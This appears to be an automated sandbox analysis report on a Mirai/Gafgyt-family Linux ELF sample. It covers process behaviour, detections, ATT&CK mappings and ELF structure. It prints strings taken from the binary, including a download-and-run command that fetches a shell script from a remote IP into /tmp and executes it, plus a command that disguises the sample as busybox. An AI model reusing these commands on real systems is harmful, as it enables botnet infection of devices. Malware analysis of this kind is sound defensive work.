                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/918/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/12/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/6240/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/13/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/14/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/6242/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/15/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/16/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/6244/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/17/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/18/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/6246/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/1594/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/120/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/121/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/1349/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/1/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/122/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/243/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/123/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/2/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/124/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/3/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/4/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/125/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/126/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/1344/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/1465/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/1586/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/127/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/6/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/248/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/128/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/249/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/1463/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/800/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/6238/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/9/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/801/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/6239/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/20/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/21/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/1900/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/22/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/23/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/24/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/6254/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/25/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/6253/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/26/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/6256/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/27/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/28/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/6258/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/29/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/491/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/250/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/130/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/251/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/6250/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/252/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/132/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/253/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/254/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/255/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/256/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/1599/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/257/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/1477/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/379/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/258/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6225)Shell command executed: sh -c "rm -rf bin/busybox && mkdir bin; >bin/busybox && mv /tmp/86xklcDnGU.elf bin/busybox; chmod 777 bin/busybox"Jump to behavior
                Source: /bin/sh (PID: 6230)Chmod executable: /usr/bin/chmod -> chmod 777 bin/busyboxJump to behavior
                Source: /bin/sh (PID: 6228)Mkdir executable: /usr/bin/mkdir -> mkdir binJump to behavior
                Source: /bin/sh (PID: 6227)Rm executable: /usr/bin/rm -> rm -rf bin/busyboxJump to behavior
                Source: /usr/bin/chmod (PID: 6230)File: /tmp/bin/busybox (bits: - usr: rwx grp: rwx all: rwx)Jump to behavior
                Source: /bin/sh (PID: 6230)Chmod executable with 777: /usr/bin/chmod -> chmod 777 bin/busyboxJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6223)Queries kernel information via 'uname': Jump to behavior
                Source: 86xklcDnGU.elf, 6223.1.0000556d0fbd8000.0000556d0fc3d000.rw-.sdmp, 86xklcDnGU.elf, 6250.1.0000556d0fbd8000.0000556d0fc3d000.rw-.sdmp, 86xklcDnGU.elf, 6254.1.0000556d0fbd8000.0000556d0fc3d000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/sparc
                Source: 86xklcDnGU.elf, 6223.1.0000556d0fbd8000.0000556d0fc3d000.rw-.sdmp, 86xklcDnGU.elf, 6250.1.0000556d0fbd8000.0000556d0fc3d000.rw-.sdmp, 86xklcDnGU.elf, 6254.1.0000556d0fbd8000.0000556d0fc3d000.rw-.sdmpBinary or memory string: mU!/etc/qemu-binfmt/sparc
                Source: 86xklcDnGU.elf, 6223.1.00007fff0480b000.00007fff0482c000.rw-.sdmp, 86xklcDnGU.elf, 6250.1.00007fff0480b000.00007fff0482c000.rw-.sdmp, 86xklcDnGU.elf, 6254.1.00007fff0480b000.00007fff0482c000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-sparc/tmp/86xklcDnGU.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/86xklcDnGU.elf
                Source: 86xklcDnGU.elf, 6223.1.00007fff0480b000.00007fff0482c000.rw-.sdmp, 86xklcDnGU.elf, 6250.1.00007fff0480b000.00007fff0482c000.rw-.sdmp, 86xklcDnGU.elf, 6254.1.00007fff0480b000.00007fff0482c000.rw-.sdmpBinary or memory string: /usr/bin/qemu-sparc

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 86xklcDnGU.elf, type: SAMPLE
                Source: Yara matchFile source: 6254.1.00007fc040011000.00007fc040036000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 6250.1.00007fc040011000.00007fc040036000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 6223.1.00007fc040011000.00007fc040036000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 86xklcDnGU.elf PID: 6223, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: 86xklcDnGU.elf PID: 6250, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: 86xklcDnGU.elf PID: 6254, type: MEMORYSTR
                Source: Yara matchFile source: 86xklcDnGU.elf, type: SAMPLE
                Source: Yara matchFile source: 6254.1.00007fc040011000.00007fc040036000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 6250.1.00007fc040011000.00007fc040036000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 6223.1.00007fc040011000.00007fc040036000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 86xklcDnGU.elf PID: 6250, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: 86xklcDnGU.elf PID: 6254, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 86xklcDnGU.elf, type: SAMPLE
                Source: Yara matchFile source: 6254.1.00007fc040011000.00007fc040036000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 6250.1.00007fc040011000.00007fc040036000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 6223.1.00007fc040011000.00007fc040036000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 86xklcDnGU.elf PID: 6223, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: 86xklcDnGU.elf PID: 6250, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: 86xklcDnGU.elf PID: 6254, type: MEMORYSTR
                Source: Yara matchFile source: 86xklcDnGU.elf, type: SAMPLE
                Source: Yara matchFile source: 6254.1.00007fc040011000.00007fc040036000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 6250.1.00007fc040011000.00007fc040036000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 6223.1.00007fc040011000.00007fc040036000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 86xklcDnGU.elf PID: 6250, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: 86xklcDnGU.elf PID: 6254, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information2
                Scripting
                Valid Accounts1
                Command and Scripting Interpreter
                2
                Scripting
                Path Interception1
                Masquerading
                1
                OS Credential Dumping
                11
                Security Software Discovery
                Remote ServicesData from Local SystemData ObfuscationExfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts2
                File and Directory Permissions Modification
                LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                File Deletion
                Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
                No configs have been found
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Number of created Files
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 1447655 Sample: 86xklcDnGU.elf Startdate: 26/05/2024 Architecture: LINUX Score: 92 29 Malicious sample detected (through community Yara rule) 2->29 31 Antivirus / Scanner detection for submitted sample 2->31 33 Multi AV Scanner detection for submitted file 2->33 35 3 other signatures 2->35 7 86xklcDnGU.elf 2->7         started        process3 process4 9 86xklcDnGU.elf 7->9         started        11 86xklcDnGU.elf sh 7->11         started        process5 13 86xklcDnGU.elf 9->13         started        15 86xklcDnGU.elf 9->15         started        17 86xklcDnGU.elf 9->17         started        27 22 other processes 9->27 19 sh rm 11->19         started        21 sh mkdir 11->21         started        23 sh mv 11->23         started        25 sh chmod 11->25         started       
                SourceDetectionScannerLabelLink
                86xklcDnGU.elf56%VirustotalBrowse
                86xklcDnGU.elf53%ReversingLabsLinux.Trojan.Gafgyt
                86xklcDnGU.elf100%AviraEXP/ELF.Mirai.Z.A
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                http://purenetworks.com/HNAP1/0%URL Reputationsafe
                http://schemas.xmlsoap.org/soap/envelope/0%URL Reputationsafe
                No contacted domains info
                NameSourceMaliciousAntivirus DetectionReputation
                http://104.244.74.231/sora.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&waninf=1_INTERNET_R_VID_154$86xklcDnGU.elffalse
                  unknown
                  http://woshishabi.zzy.rip/x8686xklcDnGU.elffalse
                    unknown
                    http://0.0.0.0/bins/sora.mips;86xklcDnGU.elffalse
                      unknown
                      http://schemas.xmlsoap.org/soap/encoding/86xklcDnGU.elffalse
                      • URL Reputation: safe
                      unknown
                      http://woshishabi.zzy.rip/wget.sh$86xklcDnGU.elffalse
                        unknown
                        http://104.244.74.231/mips86xklcDnGU.elffalse
                          unknown
                          http://104.244.74.231/x8686xklcDnGU.elffalse
                            unknown
                            http://purenetworks.com/HNAP1/86xklcDnGU.elffalse
                            • URL Reputation: safe
                            unknown
                            http://104.244.74.231/jack5tr.selfrep.sh86xklcDnGU.elffalse
                              unknown
                              http://schemas.xmlsoap.org/soap/envelope/86xklcDnGU.elffalse
                              • URL Reputation: safe
                              unknown
                              No contacted IP infos
                              No context
                              No context
                              No context
                              No context
                              No context
                              No created / dropped files found
                              File type:ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, not stripped
                              Entropy (8bit):6.2622747039864874
                              TrID:
                              • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                              File name:86xklcDnGU.elf
                              File size:178'277 bytes
                              MD5:e3f4deb0a74a97e90b7ebec168ae6a9e
                              SHA1:446d068f1ab079dc17960e1039354d019d8765a4
                              SHA256:8f85c0f7e7c783069a92967a0ddc6a5557ffd1b1633aa49e10680dca208b4c44
                              SHA512:33a7bb81f763201197099a6bb2234409d8341b5c04ea94c51cac3f79b47cb5e6c655cdfb825b03bbae8d98a7a3375a86a7e7b1feefde19c4680aeb42ea445948
                              SSDEEP:3072:651BZwCkPa3NVNxCltRLNCBCDE6otPM2cQ4Ph7vj:651BZwCkPa9nxCltR56r6b2cQ4Ph7L
                              TLSH:6D047D322A7A5F27C2D6943901F78732B5F35BC536A4810A7EB00E9CBF597A03057B66
                              File Content Preview:.ELF...........................4..S......4. ...(......................B...B...............B...B...B....p..8`..............B...B...B.................dt.Q................................@..(....@...................#.....c...`.....!..... ...@.....".........`

                              ELF header

                              Class:ELF32
                              Data:2's complement, big endian
                              Version:1 (current)
                              Machine:Sparc
                              Version Number:0x1
                              Type:EXEC (Executable file)
                              OS/ABI:UNIX - System V
                              ABI Version:0
                              Entry Point Address:0x101c4
                              Flags:0x0
                              ELF Header Size:52
                              Program Header Offset:52
                              Program Header Size:32
                              Number of Program Headers:4
                              Section Header Offset:152504
                              Section Header Size:40
                              Number of Section Headers:17
                              Header String Table Index:14
                              NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                              NULL0x00x00x00x00x0000
                              .initPROGBITS0x100b40xb40x1c0x00x6AX004
                              .textPROGBITS0x100d00xd00x1feec0x00x6AX004
                              .finiPROGBITS0x2ffbc0x1ffbc0x140x00x6AX004
                              .rodataPROGBITS0x2ffd00x1ffd00x42c80x00x2A008
                              .eh_framePROGBITS0x442980x242980x480x00x3WA004
                              .tbssNOBITS0x442e00x242e00x80x00x403WAT004
                              .ctorsPROGBITS0x442e00x242e00x80x00x3WA004
                              .dtorsPROGBITS0x442e80x242e80x80x00x3WA004
                              .jcrPROGBITS0x442f00x242f00x40x00x3WA004
                              .gotPROGBITS0x442f40x242f40x18c0x40x3WA004
                              .dataPROGBITS0x444800x244800x2880x00x3WA004
                              .bssNOBITS0x447080x247080x33f00x00x3WA008
                              .commentPROGBITS0x00x247080xc3c0x00x0001
                              .shstrtabSTRTAB0x00x253440x710x00x0001
                              .symtabSYMTAB0x00x256600x36800x100x0163054
                              .strtabSTRTAB0x00x28ce00x2b850x00x0001
                              TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                              LOAD0x00x100000x100000x242980x242986.26490x5R E0x10000.init .text .fini .rodata
                              LOAD0x242980x442980x442980x4700x38604.37650x6RW 0x10000.eh_frame .tbss .ctors .dtors .jcr .got .data .bss
                              TLS0x242e00x442e00x442e00x00x80.00000x4R 0x4.tbss
                              GNU_STACK0x00x00x00x00x00.00000x6RW 0x4
                              NameVersion Info NameVersion Info File NameSection NameValueSizeSymbol TypeSymbol BindSymbol VisibilityNdx
                              .symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                              .symtab0x100b40SECTION<unknown>DEFAULT1
                              .symtab0x100d00SECTION<unknown>DEFAULT2
                              .symtab0x2ffbc0SECTION<unknown>DEFAULT3
                              .symtab0x2ffd00SECTION<unknown>DEFAULT4
                              .symtab0x442980SECTION<unknown>DEFAULT5
                              .symtab0x442e00SECTION<unknown>DEFAULT6
                              .symtab0x442e00SECTION<unknown>DEFAULT7
                              .symtab0x442e80SECTION<unknown>DEFAULT8
                              .symtab0x442f00SECTION<unknown>DEFAULT9
                              .symtab0x442f40SECTION<unknown>DEFAULT10
                              .symtab0x444800SECTION<unknown>DEFAULT11
                              .symtab0x447080SECTION<unknown>DEFAULT12
                              .symtab0x00SECTION<unknown>DEFAULT13
                              .LLC3.symtab0x33ec00NOTYPE<unknown>DEFAULT4
                              .rem.symtab0x23e3c44FUNC<unknown>DEFAULT2
                              .udiv.symtab0x23e1c20FUNC<unknown>DEFAULT2
                              .umul.symtab0x23e3012FUNC<unknown>DEFAULT2
                              .urem.symtab0x23dfc32FUNC<unknown>DEFAULT2
                              C.23.5636.symtab0x3316824OBJECT<unknown>DEFAULT4
                              GET_UID.symtab0x476881OBJECT<unknown>DEFAULT12
                              LOCAL_ADDR.symtab0x476844OBJECT<unknown>DEFAULT12
                              _Exit.symtab0x24034128FUNC<unknown>DEFAULT2
                              _GLOBAL_OFFSET_TABLE_.symtab0x442f40OBJECT<unknown>HIDDEN10
                              _Jv_RegisterClasses.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                              _READ.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              _WRITE.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              __CTOR_END__.symtab0x442e40OBJECT<unknown>DEFAULT7
                              __CTOR_LIST__.symtab0x442e00OBJECT<unknown>DEFAULT7
                              __C_ctype_b.symtab0x446184OBJECT<unknown>DEFAULT11
                              __C_ctype_b.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              __C_ctype_b_data.symtab0x33eec768OBJECT<unknown>DEFAULT4
                              __DTOR_END__.symtab0x442ec0OBJECT<unknown>DEFAULT8
                              __DTOR_LIST__.symtab0x442e80OBJECT<unknown>DEFAULT8
                              __EH_FRAME_BEGIN__.symtab0x442980OBJECT<unknown>DEFAULT5
                              __FRAME_END__.symtab0x442dc0OBJECT<unknown>DEFAULT5
                              __GI___C_ctype_b.symtab0x446184OBJECT<unknown>HIDDEN11
                              __GI___close.symtab0x2a808124FUNC<unknown>HIDDEN2
                              __GI___close_nocancel.symtab0x2a81432FUNC<unknown>HIDDEN2
                              __GI___ctype_b.symtab0x4461c4OBJECT<unknown>HIDDEN11
                              __GI___errno_location.symtab0x2486436FUNC<unknown>HIDDEN2
                              __GI___fcntl_nocancel.symtab0x23e70196FUNC<unknown>HIDDEN2
                              __GI___fgetc_unlocked.symtab0x2e1c0344FUNC<unknown>HIDDEN2
                              __GI___glibc_strerror_r.symtab0x2781032FUNC<unknown>HIDDEN2
                              __GI___libc_close.symtab0x2a808124FUNC<unknown>HIDDEN2
                              __GI___libc_fcntl.symtab0x23f34248FUNC<unknown>HIDDEN2
                              __GI___libc_open.symtab0x2a884132FUNC<unknown>HIDDEN2
                              __GI___libc_read.symtab0x2a98c132FUNC<unknown>HIDDEN2
                              __GI___libc_write.symtab0x2a908132FUNC<unknown>HIDDEN2
                              __GI___open.symtab0x2a884132FUNC<unknown>HIDDEN2
                              __GI___open_nocancel.symtab0x2a89032FUNC<unknown>HIDDEN2
                              __GI___read.symtab0x2a98c132FUNC<unknown>HIDDEN2
                              __GI___read_nocancel.symtab0x2a99832FUNC<unknown>HIDDEN2
                              __GI___uClibc_fini.symtab0x2ac30168FUNC<unknown>HIDDEN2
                              __GI___uClibc_init.symtab0x2ad2c92FUNC<unknown>HIDDEN2
                              __GI___write.symtab0x2a908132FUNC<unknown>HIDDEN2
                              __GI___write_nocancel.symtab0x2a91432FUNC<unknown>HIDDEN2
                              __GI___xpg_strerror_r.symtab0x27838300FUNC<unknown>HIDDEN2
                              __GI__exit.symtab0x24034128FUNC<unknown>HIDDEN2
                              __GI_abort.symtab0x290c0280FUNC<unknown>HIDDEN2
                              __GI_accept.symtab0x279f496FUNC<unknown>HIDDEN2
                              __GI_atoi.symtab0x2ee9c24FUNC<unknown>HIDDEN2
                              __GI_bind.symtab0x27a5436FUNC<unknown>HIDDEN2
                              __GI_brk.symtab0x2f5bc88FUNC<unknown>HIDDEN2
                              __GI_close.symtab0x2a808124FUNC<unknown>HIDDEN2
                              __GI_closedir.symtab0x24480208FUNC<unknown>HIDDEN2
                              __GI_config_close.symtab0x2c07064FUNC<unknown>HIDDEN2
                              __GI_config_open.symtab0x2c0b880FUNC<unknown>HIDDEN2
                              __GI_config_read.symtab0x2bd14860FUNC<unknown>HIDDEN2
                              __GI_connect.symtab0x27a7896FUNC<unknown>HIDDEN2
                              __GI_execl.symtab0x2f0b0172FUNC<unknown>HIDDEN2
                              __GI_execve.symtab0x2f61c96FUNC<unknown>HIDDEN2
                              __GI_exit.symtab0x29754168FUNC<unknown>HIDDEN2
                              __GI_fclose.symtab0x2c240860FUNC<unknown>HIDDEN2
                              __GI_fcntl.symtab0x23f34248FUNC<unknown>HIDDEN2
                              __GI_fflush_unlocked.symtab0x2ddd8992FUNC<unknown>HIDDEN2
                              __GI_fgetc.symtab0x2d8ac320FUNC<unknown>HIDDEN2
                              __GI_fgetc_unlocked.symtab0x2e1c0344FUNC<unknown>HIDDEN2
                              __GI_fgets.symtab0x2d9ec260FUNC<unknown>HIDDEN2
                              __GI_fgets_unlocked.symtab0x2e318160FUNC<unknown>HIDDEN2
                              __GI_fopen.symtab0x2c59c24FUNC<unknown>HIDDEN2
                              __GI_fork.symtab0x2a0441088FUNC<unknown>HIDDEN2
                              __GI_fputs_unlocked.symtab0x25ba060FUNC<unknown>HIDDEN2
                              __GI_fseek.symtab0x2f8a036FUNC<unknown>HIDDEN2
                              __GI_fseeko64.symtab0x2f8cc448FUNC<unknown>HIDDEN2
                              __GI_fstat.symtab0x2b568116FUNC<unknown>HIDDEN2
                              __GI_fwrite_unlocked.symtab0x25be4196FUNC<unknown>HIDDEN2
                              __GI_getc_unlocked.symtab0x2e1c0344FUNC<unknown>HIDDEN2
                              __GI_getdtablesize.symtab0x2b69440FUNC<unknown>HIDDEN2
                              __GI_getegid.symtab0x2b6bc32FUNC<unknown>HIDDEN2
                              __GI_geteuid.symtab0x2b6dc32FUNC<unknown>HIDDEN2
                              __GI_getgid.symtab0x2b6fc32FUNC<unknown>HIDDEN2
                              __GI_getpagesize.symtab0x2b72456FUNC<unknown>HIDDEN2
                              __GI_getpid.symtab0x2a54888FUNC<unknown>HIDDEN2
                              __GI_getrlimit.symtab0x2b76492FUNC<unknown>HIDDEN2
                              __GI_getsockname.symtab0x27ad836FUNC<unknown>HIDDEN2
                              __GI_getuid.symtab0x2b7c032FUNC<unknown>HIDDEN2
                              __GI_inet_addr.symtab0x279cc40FUNC<unknown>HIDDEN2
                              __GI_inet_aton.symtab0x2ed6c244FUNC<unknown>HIDDEN2
                              __GI_initstate_r.symtab0x29544244FUNC<unknown>HIDDEN2
                              __GI_ioctl.symtab0x2f684228FUNC<unknown>HIDDEN2
                              __GI_isatty.symtab0x2ecd832FUNC<unknown>HIDDEN2
                              __GI_kill.symtab0x240dc92FUNC<unknown>HIDDEN2
                              __GI_listen.symtab0x27b2828FUNC<unknown>HIDDEN2
                              __GI_lseek64.symtab0x2fef8124FUNC<unknown>HIDDEN2
                              __GI_memchr.symtab0x2e438280FUNC<unknown>HIDDEN2
                              __GI_memcpy.symtab0x262d44212FUNC<unknown>HIDDEN2
                              __GI_memmove.symtab0x25cf01508FUNC<unknown>HIDDEN2
                              __GI_mempcpy.symtab0x2fe1432FUNC<unknown>HIDDEN2
                              __GI_memrchr.symtab0x2e890256FUNC<unknown>HIDDEN2
                              __GI_memset.symtab0x2737c416FUNC<unknown>HIDDEN2
                              __GI_mmap.symtab0x2b7e8108FUNC<unknown>HIDDEN2
                              __GI_mremap.symtab0x2b85c104FUNC<unknown>HIDDEN2
                              __GI_munmap.symtab0x2b8cc92FUNC<unknown>HIDDEN2
                              __GI_nanosleep.symtab0x2b98c72FUNC<unknown>HIDDEN2
                              __GI_open.symtab0x2a884132FUNC<unknown>HIDDEN2
                              __GI_opendir.symtab0x24608228FUNC<unknown>HIDDEN2
                              __GI_raise.symtab0x2a5a8264FUNC<unknown>HIDDEN2
                              __GI_random.symtab0x291f0108FUNC<unknown>HIDDEN2
                              __GI_random_r.symtab0x293bc152FUNC<unknown>HIDDEN2
                              __GI_rawmemchr.symtab0x2fe34188FUNC<unknown>HIDDEN2
                              __GI_read.symtab0x2a98c132FUNC<unknown>HIDDEN2
                              __GI_readdir.symtab0x247a4184FUNC<unknown>HIDDEN2
                              __GI_readdir64.symtab0x2bc58188FUNC<unknown>HIDDEN2
                              __GI_recv.symtab0x27b4492FUNC<unknown>HIDDEN2
                              __GI_recvfrom.symtab0x27ba096FUNC<unknown>HIDDEN2
                              __GI_remove.symtab0x248c888FUNC<unknown>HIDDEN2
                              __GI_rmdir.symtab0x2b9dc88FUNC<unknown>HIDDEN2
                              __GI_sbrk.symtab0x2ba3c108FUNC<unknown>HIDDEN2
                              __GI_select.symtab0x2421884FUNC<unknown>HIDDEN2
                              __GI_send.symtab0x27c0092FUNC<unknown>HIDDEN2
                              __GI_sendto.symtab0x27c5c96FUNC<unknown>HIDDEN2
                              __GI_setsid.symtab0x2427480FUNC<unknown>HIDDEN2
                              __GI_setsockopt.symtab0x27cbc44FUNC<unknown>HIDDEN2
                              __GI_setstate_r.symtab0x29638276FUNC<unknown>HIDDEN2
                              __GI_sigaction.symtab0x2b364264FUNC<unknown>HIDDEN2
                              __GI_sigprocmask.symtab0x2bab0172FUNC<unknown>HIDDEN2
                              __GI_sleep.symtab0x2a6b8336FUNC<unknown>HIDDEN2
                              __GI_socket.symtab0x27ce836FUNC<unknown>HIDDEN2
                              __GI_sprintf.symtab0x2492052FUNC<unknown>HIDDEN2
                              __GI_srandom_r.symtab0x29454232FUNC<unknown>HIDDEN2
                              __GI_stat.symtab0x242cc116FUNC<unknown>HIDDEN2
                              __GI_strchr.symtab0x2e5c4524FUNC<unknown>HIDDEN2
                              __GI_strchrnul.symtab0x2e990260FUNC<unknown>HIDDEN2
                              __GI_strcspn.symtab0x2ea9460FUNC<unknown>HIDDEN2
